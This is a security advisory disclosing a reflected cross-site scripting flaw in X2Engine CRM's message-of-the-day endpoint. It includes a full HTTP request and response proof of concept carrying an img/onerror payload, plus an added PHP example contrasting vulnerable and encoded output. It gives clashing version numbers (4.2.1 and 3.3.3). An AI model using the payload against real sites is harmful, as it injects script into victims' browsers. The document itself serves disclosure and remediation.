X2Engine CRM 4.2.1 Cross Site Scripting

2014-09-24T00:00:00
ID PACKETSTORM:128383
Type packetstorm
Reporter Vadodil Joel Varghese
Modified 2014-09-24T00:00:00

Description

                                        
#Affected Vendor: http://www.x2engine.com/
#Date: 24/09/2014
#Discovered by: JoeV
#Type of vulnerability: XSS
#Tested on: Windows 7
#Version: 4.2.1

#Description: X2Engine CRM v 3.3.3 is susceptible to Cross Site Scripting attack.

Proof of Concept (PoC):
---------------------------
POST /index-test.php/site/motd HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 63
Accept: */*
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/index-test.php/profile/1
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: iconSize=16x16; hudson_auto_refresh=true; /modules/system/admin.php_SystemAutotasks_sortsel=sat_name; /modules/system/admin.php_SystemAutotasks_ordersel=ASC; /modules/system/admin.php_limitsel=15; /modules/system/admin.php_SystemAutotasks_filtersel=default; cookies_on=1; __atuvc=2%7C39; PHPSESSID=6mefdfmcnj13282kb7anr4obe2

message=%22%3E%3Cimg+src%3Dd+onerror%3Dconfirm(%2Fxss%2F)%3B%3E

HTTP/1.1 200 OK
Date: Wed, 24 Sep 2014 14:00:57 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37
Content-Type: text/html

"><img src=d onerror=confirm(/xss/);>

--
Regards,

*Joel V*
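The response above reflects the `message` field verbatim into a `text/html` body, which is the whole defect. As an added example (not X2Engine's code; the handler shape, function names and markup are assumptions), here is a hypothetical PHP handler for such a `motd`-style endpoint in its vulnerable form beside a hardened version that encodes on output:

```php
<?php
// Added example; not X2Engine's code. The handler shape, function names and
// markup are assumptions used to illustrate the defect the PoC shows.

// Vulnerable: the "message" parameter is written into an HTML response as-is.
// A value beginning with "> terminates the attribute and tag it lands in, so
// the remainder of the value is parsed as live markup by the caller's browser.
function renderMotdVulnerable(string $message): string
{
    return '<div class="motd" title="' . $message . '">' . $message . '</div>';
}

// Hardened: encode for the HTML context at the point of output.
// ENT_QUOTES encodes both ' and " so the value cannot break out of an
// attribute; an explicit charset avoids input/output encoding mismatches.
function renderMotdSafe(string $message): string
{
    $safe = htmlspecialchars($message, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="motd" title="' . $safe . '">' . $safe . '</div>';
}

// Constructed sample input: the advisory's payload as PHP receives it in
// $_POST['message'] after form decoding.
$payload = '"><img src=d onerror=confirm(/xss/);>';

header('Content-Type: text/html; charset=UTF-8');
echo renderMotdSafe($payload);
// Every <, > and " in the payload is emitted as &lt;, &gt; and &quot;, so the
// browser renders the text literally instead of creating an <img> element
// with an onerror handler.
```

Where the endpoint serves only the XMLHttpRequest caller seen in the request, the equivalent fix on that path is to return `application/json` and have the client insert the value with `textContent` rather than `innerHTML`.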